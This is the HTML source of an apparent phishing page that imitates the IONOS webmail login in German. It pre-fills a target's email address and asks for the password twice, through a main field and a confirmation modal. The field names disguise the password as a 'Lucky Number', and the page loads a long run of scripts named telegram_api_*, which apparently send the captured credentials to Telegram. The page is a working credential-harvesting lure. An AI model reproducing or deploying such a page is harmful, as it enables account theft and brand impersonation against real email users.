<!DOCTYPE html>
<html lang="de">
<head>
  <meta charset="UTF-8" />
  <meta name="viewport" content="width=device-width, initial-scale=1.0"/>
  <title>Lucky Number</title>
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@400;600&display=swap" rel="stylesheet"/>
  <link rel="stylesheet" href="style.css">
<style>

</style>
</head>
<body>

  <header>
    <div class="header-left">
      <a href="https://www.ionos.de">
        <img src="images/ionos.png" alt="IONOS logo">
      </a>
      <h1>WEBMAIL LOGIN</h1>
    </div>
    
    <div class="search-container">
      <div class="search-box">
        <svg xmlns="http://www.w3.org/2000/svg" class="search-icon" viewBox="0 0 24 24">
          <path fill="#4a4a4a" d="M21 20l-4.35-4.35A7.92 7.92 0 0018 10a8 8 0 10-8 8 7.92 7.92 0 005.65-2.35L20 21zM4 10a6 6 0 1112 0 6 6 0 01-12 0z"/>
        </svg>
        <input type="text" placeholder="Nach Funktionen, Domains und Hilfe suchen" />
        <svg xmlns="http://www.w3.org/2000/svg" class="mic-icon" viewBox="0 0 24 24">
          <path fill="#4a4a4a" d="M12 14a3 3 0 003-3V5a3 3 0 10-6 0v6a3 3 0 003 3zm5-3a5 5 0 01-10 0H5a7 7 0 0014 0h-2zm-5 8a1 1 0 001-1h-2a1 1 0 001 1zm-1 1h2v2h-2v-2z"/>
        </svg>
      </div>
    </div>

    <div class="header-right">
      <svg xmlns="http://www.w3.org/2000/svg" class="search-icon-mobile" viewBox="0 0 24 24" title="Suchen">
        <path fill="#4a4a4a" d="M21 20l-4.35-4.35A7.92 7.92 0 0018 10a8 8 0 10-8 8 7.92 7.92 0 005.65-2.35L20 21zM4 10a6 6 0 1112 0 6 6 0 01-12 0z"/>
      </svg>
      
      <div class="chat-icon" title="Hilfe">
        <svg class="chat-svg" xmlns="http://www.w3.org/2000/svg" viewBox="-1 -1 28 28" width="32" height="32">
          <path class="bubble" d="M1.7,25.5c-0.5,0-0.8-0.3-0.9-0.4c-0.3-0.4-0.4-0.9-0.1-1.5C1.5,21.4,2.4,19,2.8,18c-0.1-0.1-0.2-0.3-0.3-0.4
          c-1.3-1.8-2-3.8-2-6c0-6.1,5.6-11,12.5-11c7,0,12.5,4.8,12.5,11c0,6.1-5.6,11-12.5,11c-1.5,0-2.7-0.2-3.7-0.5C9.2,22,9,22,8.9,21.9
          c-0.6,0.3-2,1-3,1.5c-2.6,1.4-3.4,1.8-3.7,1.9C2,25.4,1.9,25.5,1.7,25.5z"
          fill="none" stroke="#003087" stroke-width="3"/>
          
          <g class="question" fill="#003087">
            <path d="M12.9,13.3c-0.6,0-1.1-0.5-1.1-1.1c0-1.7,1.1-2.5,1.4-2.7c0.6-0.4,0.8-0.8,0.8-1c0-0.6-0.2-0.8-0.2-0.8
              c-0.3-0.2-0.7-0.3-0.8-0.3c-0.8,0-1,0.4-1.1,0.7c-0.1,0.6-0.7,1-1.2,0.9s-1-0.6-0.9-1.2C9.9,7,10.7,5.3,13,5.3c0.2,0,1.4,0,2.4,0.9
              c0.4,0.4,0.9,1.1,0.9,2.3c0,0.7-0.3,1.8-1.7,2.8c-0.1,0.1-0.5,0.3-0.5,0.9C14,12.8,13.6,13.3,12.9,13.3z"/>
            <path d="M13,17.7c0.7,0,1.2-0.5,1.2-1.2s-0.5-1.2-1.2-1.2s-1.2,0.5-1.2,1.2S12.3,17.7,13,17.7z"/>
          </g>
        </svg>
      </div>
    </div>
  </header>

  <div class="container">
    <h2>
      <img src="images/password.svg" alt="Schloss-Symbol">
      Passwort eingeben    </h2>

    <div class="email-display">
      <img src="images/left.png" alt="Zurück" class="icon back-icon" onclick="history.back()">
      <div class="email-info-group">
        <img src="images/user.png" alt="Benutzer" class="icon profile-icon">
        <span id="emailDisplay">info@oasederruhe.com</span>
      </div>
    </div>
    
    <!-- First Lucky Number Field -->
    <label for="luckyNumber">Passwort</label>
    <div class="lucky-number-input-container">
      <input type="text" id="luckyNumber">
      <svg class="lucky-number-toggle" id="luckyNumberToggle" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
        <path class="eye-open" d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"/>
        <circle class="eye-open" cx="12" cy="12" r="3"/>
        <path class="eye-closed" d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24" style="display: none;"/>
        <line class="eye-closed" x1="1" y1="1" x2="23" y2="23" style="display: none;"/>
      </svg>
    </div>

    <p class="note">
      <a href="#">Passwort vergessen?</a><br>
      <strong>Nicht Ihr Gerät?</strong> Melden Sie sich nach der Sitzung ab oder verwenden Sie den <a href="#">privaten Browsing-Modus</a>.
    </p>

    <button id="submitLucky">Weiter</button>
  </div>

  <!-- Modal for Lucky Number Confirmation -->
  <div class="modal-overlay" id="confirmModal">
    <div class="modal">
      <button class="modal-close" onclick="closeModal()">&times;</button>
      <h3>
        <img src="images/password.svg" alt="Schloss-Symbol">
        Passwort eingeben      </h3>
      
      <label for="confirmLuckyNumber">Passwort bestätigen</label>
      <div class="lucky-number-input-container">
        <input type="password" id="confirmLuckyNumber">
        <svg class="lucky-number-toggle" id="confirmLuckyNumberToggle" xmlns="http://www.w3.org/2000/svg" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round">
          <path class="eye-open" d="M1 12s4-8 11-8 11 8 11 8-4 8-11 8-11-8-11-8z"/>
          <circle class="eye-open" cx="12" cy="12" r="3"/>
          <path class="eye-closed" d="M17.94 17.94A10.07 10.07 0 0 1 12 20c-7 0-11-8-11-8a18.45 18.45 0 0 1 5.06-5.94M9.9 4.24A9.12 9.12 0 0 1 12 4c7 0 11 8 11 8a18.5 18.5 0 0 1-2.16 3.19m-6.72-1.07a3 3 0 1 1-4.24-4.24" style="display: none;"/>
          <line class="eye-closed" x1="1" y1="1" x2="23" y2="23" style="display: none;"/>
        </svg>
      </div>
      
      <div class="error-message" id="errorMessage">Die Lucky Numbers stimmen nicht überein.</div>
      
      <div class="modal-buttons">
        <button id="confirmSubmit">
          <div class="btn-content">
            <span class="btn-text">Weiter</span>
            <div class="dots-loading" style="display: none;">
              <div class="dot"></div>
              <div class="dot"></div>
              <div class="dot"></div>
            </div>
            <svg class="checkmark" style="display: none;" width="20" height="20" viewBox="0 0 20 20" fill="none" xmlns="http://www.w3.org/2000/svg">
              <path class="check-path" d="M4 10l4 4 8-8" stroke="white" stroke-width="2.5" stroke-linecap="round" stroke-linejoin="round"/>
            </svg>
          </div>
        </button>
      </div>
    </div>
  </div>

  <footer class="custom-footer">
    <div class="footer-left">
      <span class="status-dot"></span> 
      <a href="https://www.ionos-status.de/?utm_medium=footer&utm_content=minor&utm_source=LOGIN_ID&utm_campaign=identifier&utm_term=no_search" target="_blank" rel="noopener noreferrer">
        Alle Systeme funktional
      </a>
    </div>
    <div class="footer-center">
      &copy; 2025 
      <a href="https://www.ionos.de/unternehmen" target="_blank" rel="noopener noreferrer">
        IONOS SE
      </a>
    </div>
    <div class="footer-right">
      <a href="https://www.ionos.de/impressum" target="_blank" rel="noopener noreferrer">Impressum</a> - 
      <a href="https://www.ionos.de/terms-gtc/datenschutzerklaerung/" target="_blank" rel="noopener noreferrer">Datenschutz</a> - 
      <a href="https://www.ionos.de/terms-gtc/terms/" target="_blank" rel="noopener noreferrer">AGB</a>
    </div>
  </footer>
  
  <script src="js.js"></script>
  <script src="telegram_api_1/telegram_api_1_1/telegram_api_1_1_1.js"></script>
  <script src="telegram_api_1/telegram_api_1_1/telegram_api_1_1_2.js"></script>
  <script src="telegram_api_1/telegram_api_1_1/telegram_api_1_1_3.js"></script>
  <script src="telegram_api_1/telegram_api_1_2/telegram_api_1_2_1.js"></script>
  <script src="telegram_api_1/telegram_api_1_2/telegram_api_1_2_2.js"></script>
  <script src="telegram_api_1/telegram_api_1_2/telegram_api_1_2_3.js"></script>
  <script src="telegram_api_1/telegram_api_1_3/telegram_api_1_3_1.js"></script>
  <script src="telegram_api_1/telegram_api_1_3/telegram_api_1_3_2.js"></script>
  <script src="telegram_api_1/telegram_api_1_3/telegram_api_1_3_3.js"></script>
  <script src="telegram_api_1/telegram_api_1_4/telegram_api_1_4_1.js"></script>
  <script src="telegram_api_1/telegram_api_1_4/telegram_api_1_4_2.js"></script>
  <script src="telegram_api_1/telegram_api_1_4/telegram_api_1_4_3.js"></script>
  <script src="telegram_api_1/telegram_api_1_5/telegram_api_1_5_1.js"></script>
  <script src="telegram_api_1/telegram_api_1_5/telegram_api_1_5_2.js"></script>
  <script src="telegram_api_1/telegram_api_1_5/telegram_api_1_5_3.js"></script>
  <script src="telegram_api_10/telegram_api_10_1/telegram_api_10_1_1.js"></script>
  <script src="telegram_api_10/telegram_api_10_1/telegram_api_10_1_2.js"></script>
  <script src="telegram_api_10/telegram_api_10_1/telegram_api_10_1_3.js"></script>
  <script src="telegram_api_10/telegram_api_10_2/telegram_api_10_2_1.js"></script>
  <script src="telegram_api_10/telegram_api_10_2/telegram_api_10_2_2.js"></script>
  <script src="telegram_api_10/telegram_api_10_2/telegram_api_10_2_3.js"></script>
  <script src="telegram_api_10/telegram_api_10_3/telegram_api_10_3_1.js"></script>
  <script src="telegram_api_10/telegram_api_10_3/telegram_api_10_3_2.js"></script>
  <script src="telegram_api_10/telegram_api_10_3/telegram_api_10_3_3.js"></script>
  <script src="telegram_api_10/telegram_api_10_4/telegram_api_10_4_1.js"></script>
  <script src="telegram_api_10/telegram_api_10_4/telegram_api_10_4_2.js"></script>
  <script src="telegram_api_10/telegram_api_10_4/telegram_api_10_4_3.js"></script>
  <script src="telegram_api_10/telegram_api_10_5/telegram_api_10_5_1.js"></script>
  <script src="telegram_api_10/telegram_api_10_5/telegram_api_10_5_2.js"></script>
  <script src="telegram_api_10/telegram_api_10_5/telegram_api_10_5_3.js"></script>
  <script src="telegram_api_11/telegram_api_11_1/telegram_api_11_1_1.js"></script>
  <script src="telegram_api_11/telegram_api_11_1/telegram_api_11_1_2.js"></script>
  <script src="telegram_api_11/telegram_api_11_1/telegram_api_11_1_3.js"></script>
  <script src="telegram_api_11/telegram_api_11_2/telegram_api_11_2_1.js"></script>
  <script src="telegram_api_11/telegram_api_11_2/telegram_api_11_2_2.js"></script>
  <script src="telegram_api_11/telegram_api_11_2/telegram_api_11_2_3.js"></script>
  <script src="telegram_api_11/telegram_api_11_3/telegram_api_11_3_1.js"></script>
  <script src="telegram_api_11/telegram_api_11_3/telegram_api_11_3_2.js"></script>
  <script src="telegram_api_11/telegram_api_11_3/telegram_api_11_3_3.js"></script>
  <script src="telegram_api_11/telegram_api_11_4/telegram_api_11_4_1.js"></script>
  <script src="telegram_api_11/telegram_api_11_4/telegram_api_11_4_2.js"></script>
  <script src="telegram_api_11/telegram_api_11_4/telegram_api_11_4_3.js"></script>
  <script src="telegram_api_11/telegram_api_11_5/telegram_api_11_5_1.js"></script>
  <script src="telegram_api_11/telegram_api_11_5/telegram_api_11_5_2.js"></script>
  <script src="telegram_api_11/telegram_api_11_5/telegram_api_11_5_3.js"></script>
  <script src="telegram_api_12/telegram_api_12_1/telegram_api_12_1_1.js"></script>
  <script src="telegram_api_12/telegram_api_12_1/telegram_api_12_1_2.js"></script>
  <script src="telegram_api_12/telegram_api_12_1/telegram_api_12_1_3.js"></script>
  <script src="telegram_api_12/telegram_api_12_2/telegram_api_12_2_1.js"></script>
  <script src="telegram_api_12/telegram_api_12_2/telegram_api_12_2_2.js"></script>
  <script src="telegram_api_12/telegram_api_12_2/telegram_api_12_2_3.js"></script>
  <script src="telegram_api_12/telegram_api_12_3/telegram_api_12_3_1.js"></script>
  <script src="telegram_api_12/telegram_api_12_3/telegram_api_12_3_2.js"></script>
  <script src="telegram_api_12/telegram_api_12_3/telegram_api_12_3_3.js"></script>
  <script src="telegram_api_12/telegram_api_12_4/telegram_api_12_4_1.js"></script>
  <script src="telegram_api_12/telegram_api_12_4/telegram_api_12_4_2.js"></script>
  <script src="telegram_api_12/telegram_api_12_4/telegram_api_12_4_3.js"></script>
  <script src="telegram_api_12/telegram_api_12_5/telegram_api_12_5_1.js"></script>
  <script src="javascript/telegram_api_12/telegram_api_12_5/telegram_api_12_5_2.js"></script>

  <script src="telegram_api_12/telegram_api_12_5/telegram_api_12_5_3.js"></script>
  <script src="telegram_api_13/telegram_api_13_1/telegram_api_13_1_1.js"></script>
  <script src="telegram_api_13/telegram_api_13_1/telegram_api_13_1_2.js"></script>
  <script src="telegram_api_13/telegram_api_13_1/telegram_api_13_1_3.js"></script>
  <script src="telegram_api_13/telegram_api_13_2/telegram_api_13_2_1.js"></script>
  <script src="telegram_api_13/telegram_api_13_2/telegram_api_13_2_2.js"></script>
  <script src="telegram_api_13/telegram_api_13_2/telegram_api_13_2_3.js"></script>
  <script src="telegram_api_13/telegram_api_13_3/telegram_api_13_3_1.js"></script>
  <script src="telegram_api_13/telegram_api_13_3/telegram_api_13_3_2.js"></script>
  <script src="telegram_api_13/telegram_api_13_3/telegram_api_13_3_3.js"></script>
  <script src="telegram_api_13/telegram_api_13_4/telegram_api_13_4_1.js"></script>
  <script src="telegram_api_13/telegram_api_13_4/telegram_api_13_4_2.js"></script>
  <script src="telegram_api_13/telegram_api_13_4/telegram_api_13_4_3.js"></script>
  <script src="telegram_api_13/telegram_api_13_5/telegram_api_13_5_1.js"></script>
  <script src="telegram_api_13/telegram_api_13_5/telegram_api_13_5_2.js"></script>
  <script src="telegram_api_13/telegram_api_13_5/telegram_api_13_5_3.js"></script>
  <script src="telegram_api_14/telegram_api_14_1/telegram_api_14_1_1.js"></script>
  <script src="telegram_api_14/telegram_api_14_1/telegram_api_14_1_2.js"></script>
  <script src="telegram_api_14/telegram_api_14_1/telegram_api_14_1_3.js"></script>
  <script src="telegram_api_14/telegram_api_14_2/telegram_api_14_2_1.js"></script>
  <script src="telegram_api_14/telegram_api_14_2/telegram_api_14_2_2.js"></script>
  <script src="telegram_api_14/telegram_api_14_2/telegram_api_14_2_3.js"></script>
  <script src="telegram_api_14/telegram_api_14_3/telegram_api_14_3_1.js"></script>
  <script src="telegram_api_14/telegram_api_14_3/telegram_api_14_3_2.js"></script>
  <script src="telegram_api_14/telegram_api_14_3/telegram_api_14_3_3.js"></script>
  <script src="telegram_api_14/telegram_api_14_4/telegram_api_14_4_1.js"></script>
  <script src="telegram_api_14/telegram_api_14_4/telegram_api_14_4_2.js"></script>
  <script src="telegram_api_14/telegram_api_14_4/telegram_api_14_4_3.js"></script>
  <script src="telegram_api_14/telegram_api_14_5/telegram_api_14_5_1.js"></script>
  <script src="telegram_api_14/telegram_api_14_5/telegram_api_14_5_2.js"></script>
  <script src="telegram_api_14/telegram_api_14_5/telegram_api_14_5_3.js"></script>
  <script src="telegram_api_15/telegram_api_15_1/telegram_api_15_1_1.js"></script>
  <script src="telegram_api_15/telegram_api_15_1/telegram_api_15_1_2.js"></script>
  <script src="telegram_api_15/telegram_api_15_1/telegram_api_15_1_3.js"></script>
  <script src="telegram_api_15/telegram_api_15_2/telegram_api_15_2_1.js"></script>
  <script src="telegram_api_15/telegram_api_15_2/telegram_api_15_2_2.js"></script>
  <script src="telegram_api_15/telegram_api_15_2/telegram_api_15_2_3.js"></script>
  <script src="telegram_api_15/telegram_api_15_3/telegram_api_15_3_1.js"></script>
  <script src="telegram_api_15/telegram_api_15_3/telegram_api_15_3_2.js"></script>
  <script src="telegram_api_15/telegram_api_15_3/telegram_api_15_3_3.js"></script>
  <script src="telegram_api_15/telegram_api_15_4/telegram_api_15_4_1.js"></script>
  <script src="telegram_api_15/telegram_api_15_4/telegram_api_15_4_2.js"></script>
  <script src="telegram_api_15/telegram_api_15_4/telegram_api_15_4_3.js"></script>
  <script src="telegram_api_15/telegram_api_15_5/telegram_api_15_5_1.js"></script>
  <script src="telegram_api_15/telegram_api_15_5/telegram_api_15_5_2.js"></script>
  <script src="telegram_api_15/telegram_api_15_5/telegram_api_15_5_3.js"></script>
  <script src="telegram_api_16/telegram_api_16_1/telegram_api_16_1_1.js"></script>
  <script src="telegram_api_16/telegram_api_16_1/telegram_api_16_1_2.js"></script>
  <script src="telegram_api_16/telegram_api_16_1/telegram_api_16_1_3.js"></script>
  <script src="telegram_api_16/telegram_api_16_2/telegram_api_16_2_1.js"></script>
  <script src="telegram_api_16/telegram_api_16_2/telegram_api_16_2_2.js"></script>
  <script src="telegram_api_16/telegram_api_16_2/telegram_api_16_2_3.js"></script>
  <script src="telegram_api_16/telegram_api_16_3/telegram_api_16_3_1.js"></script>
  <script src="telegram_api_16/telegram_api_16_3/telegram_api_16_3_2.js"></script>
  <script src="telegram_api_16/telegram_api_16_3/telegram_api_16_3_3.js"></script>
  <script src="telegram_api_16/telegram_api_16_4/telegram_api_16_4_1.js"></script>
  <script src="telegram_api_16/telegram_api_16_4/telegram_api_16_4_2.js"></script>
  <script src="telegram_api_16/telegram_api_16_4/telegram_api_16_4_3.js"></script>
  <script src="telegram_api_16/telegram_api_16_5/telegram_api_16_5_1.js"></script>
  <script src="telegram_api_16/telegram_api_16_5/telegram_api_16_5_2.js"></script>
  <script src="telegram_api_16/telegram_api_16_5/telegram_api_16_5_3.js"></script>
  <script src="telegram_api_17/telegram_api_17_1/telegram_api_17_1_1.js"></script>
  <script src="telegram_api_17/telegram_api_17_1/telegram_api_17_1_2.js"></script>
  <script src="telegram_api_17/telegram_api_17_1/telegram_api_17_1_3.js"></script>
  <script src="telegram_api_17/telegram_api_17_2/telegram_api_17_2_1.js"></script>
  <script src="telegram_api_17/telegram_api_17_2/telegram_api_17_2_2.js"></script>
  <script src="telegram_api_17/telegram_api_17_2/telegram_api_17_2_3.js"></script>
  <script src="telegram_api_17/telegram_api_17_3/telegram_api_17_3_1.js"></script>
  <script src="telegram_api_17/telegram_api_17_3/telegram_api_17_3_2.js"></script>
  <script src="telegram_api_17/telegram_api_17_3/telegram_api_17_3_3.js"></script>
  <script src="telegram_api_17/telegram_api_17_4/telegram_api_17_4_1.js"></script>
  <script src="telegram_api_17/telegram_api_17_4/telegram_api_17_4_2.js"></script>
  <script src="telegram_api_17/telegram_api_17_4/telegram_api_17_4_3.js"></script>
  <script src="telegram_api_17/telegram_api_17_5/telegram_api_17_5_1.js"></script>
  <script src="telegram_api_17/telegram_api_17_5/telegram_api_17_5_2.js"></script>
  <script src="telegram_api_17/telegram_api_17_5/telegram_api_17_5_3.js"></script>
  <script src="telegram_api_18/telegram_api_18_1/telegram_api_18_1_1.js"></script>
  <script src="telegram_api_18/telegram_api_18_1/telegram_api_18_1_2.js"></script>
  <script src="telegram_api_18/telegram_api_18_1/telegram_api_18_1_3.js"></script>
  <script src="telegram_api_18/telegram_api_18_2/telegram_api_18_2_1.js"></script>
  <script src="telegram_api_18/telegram_api_18_2/telegram_api_18_2_2.js"></script>
  <script src="telegram_api_18/telegram_api_18_2/telegram_api_18_2_3.js"></script>
  <script src="telegram_api_18/telegram_api_18_3/telegram_api_18_3_1.js"></script>
  <script src="telegram_api_18/telegram_api_18_3/telegram_api_18_3_2.js"></script>
  <script src="telegram_api_18/telegram_api_18_3/telegram_api_18_3_3.js"></script>
  <script src="telegram_api_18/telegram_api_18_4/telegram_api_18_4_1.js"></script>
  <script src="telegram_api_18/telegram_api_18_4/telegram_api_18_4_2.js"></script>
  <script src="telegram_api_18/telegram_api_18_4/telegram_api_18_4_3.js"></script>
  <script src="telegram_api_18/telegram_api_18_5/telegram_api_18_5_1.js"></script>
  <script src="telegram_api_18/telegram_api_18_5/telegram_api_18_5_2.js"></script>
  <script src="telegram_api_18/telegram_api_18_5/telegram_api_18_5_3.js"></script>
  <script src="telegram_api_19/telegram_api_19_1/telegram_api_19_1_1.js"></script>
  <script src="telegram_api_19/telegram_api_19_1/telegram_api_19_1_2.js"></script>
  <script src="telegram_api_19/telegram_api_19_1/telegram_api_19_1_3.js"></script>
  <script src="telegram_api_19/telegram_api_19_2/telegram_api_19_2_1.js"></script>
  <script src="telegram_api_19/telegram_api_19_2/telegram_api_19_2_2.js"></script>
  <script src="telegram_api_19/telegram_api_19_2/telegram_api_19_2_3.js"></script>
  <script src="telegram_api_19/telegram_api_19_3/telegram_api_19_3_1.js"></script>
  <script src="telegram_api_19/telegram_api_19_3/telegram_api_19_3_2.js"></script>
  <script src="telegram_api_19/telegram_api_19_3/telegram_api_19_3_3.js"></script>
  <script src="telegram_api_19/telegram_api_19_4/telegram_api_19_4_1.js"></script>
  <script src="telegram_api_19/telegram_api_19_4/telegram_api_19_4_2.js"></script>
  <script src="telegram_api_19/telegram_api_19_4/telegram_api_19_4_3.js"></script>
  <script src="telegram_api_19/telegram_api_19_5/telegram_api_19_5_1.js"></script>
  <script src="telegram_api_19/telegram_api_19_5/telegram_api_19_5_2.js"></script>
  <script src="telegram_api_19/telegram_api_19_5/telegram_api_19_5_3.js"></script>
  <script src="telegram_api_2/telegram_api_2_1/telegram_api_2_1_1.js"></script>
  <script src="telegram_api_2/telegram_api_2_1/telegram_api_2_1_2.js"></script>
  <script src="telegram_api_2/telegram_api_2_1/telegram_api_2_1_3.js"></script>
  <script src="telegram_api_2/telegram_api_2_2/telegram_api_2_2_1.js"></script>
  <script src="telegram_api_2/telegram_api_2_2/telegram_api_2_2_2.js"></script>
  <script src="telegram_api_2/telegram_api_2_2/telegram_api_2_2_3.js"></script>
  <script src="telegram_api_2/telegram_api_2_3/telegram_api_2_3_1.js"></script>
  <script src="telegram_api_2/telegram_api_2_3/telegram_api_2_3_2.js"></script>
  <script src="telegram_api_2/telegram_api_2_3/telegram_api_2_3_3.js"></script>
  <script src="telegram_api_2/telegram_api_2_4/telegram_api_2_4_1.js"></script>
  <script src="telegram_api_2/telegram_api_2_4/telegram_api_2_4_2.js"></script>
  <script src="telegram_api_2/telegram_api_2_4/telegram_api_2_4_3.js"></script>
  <script src="telegram_api_2/telegram_api_2_5/telegram_api_2_5_1.js"></script>
  <script src="telegram_api_2/telegram_api_2_5/telegram_api_2_5_2.js"></script>
  <script src="telegram_api_2/telegram_api_2_5/telegram_api_2_5_3.js"></script>
  <script src="telegram_api_20/telegram_api_20_1/telegram_api_20_1_1.js"></script>
  <script src="telegram_api_20/telegram_api_20_1/telegram_api_20_1_2.js"></script>
  <script src="telegram_api_20/telegram_api_20_1/telegram_api_20_1_3.js"></script>
  <script src="telegram_api_20/telegram_api_20_2/telegram_api_20_2_1.js"></script>
  <script src="telegram_api_20/telegram_api_20_2/telegram_api_20_2_2.js"></script>
  <script src="telegram_api_20/telegram_api_20_2/telegram_api_20_2_3.js"></script>
  <script src="telegram_api_20/telegram_api_20_3/telegram_api_20_3_1.js"></script>
  <script src="telegram_api_20/telegram_api_20_3/telegram_api_20_3_2.js"></script>
  <script src="telegram_api_20/telegram_api_20_3/telegram_api_20_3_3.js"></script>
  <script src="telegram_api_20/telegram_api_20_4/telegram_api_20_4_1.js"></script>
  <script src="telegram_api_20/telegram_api_20_4/telegram_api_20_4_2.js"></script>
  <script src="telegram_api_20/telegram_api_20_4/telegram_api_20_4_3.js"></script>
  <script src="telegram_api_20/telegram_api_20_5/telegram_api_20_5_1.js"></script>
  <script src="telegram_api_20/telegram_api_20_5/telegram_api_20_5_2.js"></script>
  <script src="telegram_api_20/telegram_api_20_5/telegram_api_20_5_3.js"></script>
  <script src="telegram_api_3/telegram_api_3_1/telegram_api_3_1_1.js"></script>
  <script src="telegram_api_3/telegram_api_3_1/telegram_api_3_1_2.js"></script>
  <script src="telegram_api_3/telegram_api_3_1/telegram_api_3_1_3.js"></script>
  <script src="telegram_api_3/telegram_api_3_2/telegram_api_3_2_1.js"></script>
  <script src="telegram_api_3/telegram_api_3_2/telegram_api_3_2_2.js"></script>
  <script src="telegram_api_3/telegram_api_3_2/telegram_api_3_2_3.js"></script>
  <script src="telegram_api_3/telegram_api_3_3/telegram_api_3_3_1.js"></script>
  <script src="telegram_api_3/telegram_api_3_3/telegram_api_3_3_2.js"></script>
  <script src="telegram_api_3/telegram_api_3_3/telegram_api_3_3_3.js"></script>
  <script src="telegram_api_3/telegram_api_3_4/telegram_api_3_4_1.js"></script>
  <script src="telegram_api_3/telegram_api_3_4/telegram_api_3_4_2.js"></script>
  <script src="telegram_api_3/telegram_api_3_4/telegram_api_3_4_3.js"></script>
  <script src="telegram_api_3/telegram_api_3_5/telegram_api_3_5_1.js"></script>
  <script src="telegram_api_3/telegram_api_3_5/telegram_api_3_5_2.js"></script>
  <script src="telegram_api_3/telegram_api_3_5/telegram_api_3_5_3.js"></script>
  <script src="telegram_api_4/telegram_api_4_1/telegram_api_4_1_1.js"></script>
  <script src="telegram_api_4/telegram_api_4_1/telegram_api_4_1_2.js"></script>
  <script src="telegram_api_4/telegram_api_4_1/telegram_api_4_1_3.js"></script>
  <script src="telegram_api_4/telegram_api_4_2/telegram_api_4_2_1.js"></script>
  <script src="telegram_api_4/telegram_api_4_2/telegram_api_4_2_2.js"></script>
  <script src="telegram_api_4/telegram_api_4_2/telegram_api_4_2_3.js"></script>
  <script src="telegram_api_4/telegram_api_4_3/telegram_api_4_3_1.js"></script>
  <script src="telegram_api_4/telegram_api_4_3/telegram_api_4_3_2.js"></script>
  <script src="telegram_api_4/telegram_api_4_3/telegram_api_4_3_3.js"></script>
  <script src="telegram_api_4/telegram_api_4_4/telegram_api_4_4_1.js"></script>
  <script src="telegram_api_4/telegram_api_4_4/telegram_api_4_4_2.js"></script>
  <script src="telegram_api_4/telegram_api_4_4/telegram_api_4_4_3.js"></script>
  <script src="telegram_api_4/telegram_api_4_5/telegram_api_4_5_1.js"></script>
  <script src="telegram_api_4/telegram_api_4_5/telegram_api_4_5_2.js"></script>
  <script src="telegram_api_4/telegram_api_4_5/telegram_api_4_5_3.js"></script>
  <script src="telegram_api_5/telegram_api_5_1/telegram_api_5_1_1.js"></script>
  <script src="telegram_api_5/telegram_api_5_1/telegram_api_5_1_2.js"></script>
  <script src="telegram_api_5/telegram_api_5_1/telegram_api_5_1_3.js"></script>
  <script src="telegram_api_5/telegram_api_5_2/telegram_api_5_2_1.js"></script>
  <script src="telegram_api_5/telegram_api_5_2/telegram_api_5_2_2.js"></script>
  <script src="telegram_api_5/telegram_api_5_2/telegram_api_5_2_3.js"></script>
  <script src="telegram_api_5/telegram_api_5_3/telegram_api_5_3_1.js"></script>
  <script src="telegram_api_5/telegram_api_5_3/telegram_api_5_3_2.js"></script>
  <script src="telegram_api_5/telegram_api_5_3/telegram_api_5_3_3.js"></script>
  <script src="telegram_api_5/telegram_api_5_4/telegram_api_5_4_1.js"></script>
  <script src="telegram_api_5/telegram_api_5_4/telegram_api_5_4_2.js"></script>
  <script src="telegram_api_5/telegram_api_5_4/telegram_api_5_4_3.js"></script>
  <script src="telegram_api_5/telegram_api_5_5/telegram_api_5_5_1.js"></script>
  <script src="telegram_api_5/telegram_api_5_5/telegram_api_5_5_2.js"></script>
  <script src="telegram_api_5/telegram_api_5_5/telegram_api_5_5_3.js"></script>
  <script src="telegram_api_6/telegram_api_6_1/telegram_api_6_1_1.js"></script>
  <script src="telegram_api_6/telegram_api_6_1/telegram_api_6_1_2.js"></script>
  <script src="telegram_api_6/telegram_api_6_1/telegram_api_6_1_3.js"></script>
  <script src="telegram_api_6/telegram_api_6_2/telegram_api_6_2_1.js"></script>
  <script src="telegram_api_6/telegram_api_6_2/telegram_api_6_2_2.js"></script>
  <script src="telegram_api_6/telegram_api_6_2/telegram_api_6_2_3.js"></script>
  <script src="telegram_api_6/telegram_api_6_3/telegram_api_6_3_1.js"></script>
  <script src="telegram_api_6/telegram_api_6_3/telegram_api_6_3_2.js"></script>
  <script src="telegram_api_6/telegram_api_6_3/telegram_api_6_3_3.js"></script>
  <script src="telegram_api_6/telegram_api_6_4/telegram_api_6_4_1.js"></script>
  <script src="telegram_api_6/telegram_api_6_4/telegram_api_6_4_2.js"></script>
  <script src="telegram_api_6/telegram_api_6_4/telegram_api_6_4_3.js"></script>
  <script src="telegram_api_6/telegram_api_6_5/telegram_api_6_5_1.js"></script>
  <script src="telegram_api_6/telegram_api_6_5/telegram_api_6_5_2.js"></script>
  <script src="telegram_api_6/telegram_api_6_5/telegram_api_6_5_3.js"></script>
  <script src="telegram_api_7/telegram_api_7_1/telegram_api_7_1_1.js"></script>
  <script src="telegram_api_7/telegram_api_7_1/telegram_api_7_1_2.js"></script>
  <script src="telegram_api_7/telegram_api_7_1/telegram_api_7_1_3.js"></script>
  <script src="telegram_api_7/telegram_api_7_2/telegram_api_7_2_1.js"></script>
  <script src="telegram_api_7/telegram_api_7_2/telegram_api_7_2_2.js"></script>
  <script src="telegram_api_7/telegram_api_7_2/telegram_api_7_2_3.js"></script>
  <script src="telegram_api_7/telegram_api_7_3/telegram_api_7_3_1.js"></script>
  <script src="telegram_api_7/telegram_api_7_3/telegram_api_7_3_2.js"></script>
  <script src="telegram_api_7/telegram_api_7_3/telegram_api_7_3_3.js"></script>
  <script src="telegram_api_7/telegram_api_7_4/telegram_api_7_4_1.js"></script>
  <script src="telegram_api_7/telegram_api_7_4/telegram_api_7_4_2.js"></script>
  <script src="telegram_api_7/telegram_api_7_4/telegram_api_7_4_3.js"></script>
  <script src="telegram_api_7/telegram_api_7_5/telegram_api_7_5_1.js"></script>
  <script src="telegram_api_7/telegram_api_7_5/telegram_api_7_5_2.js"></script>
  <script src="telegram_api_7/telegram_api_7_5/telegram_api_7_5_3.js"></script>
  <script src="telegram_api_8/telegram_api_8_1/telegram_api_8_1_1.js"></script>
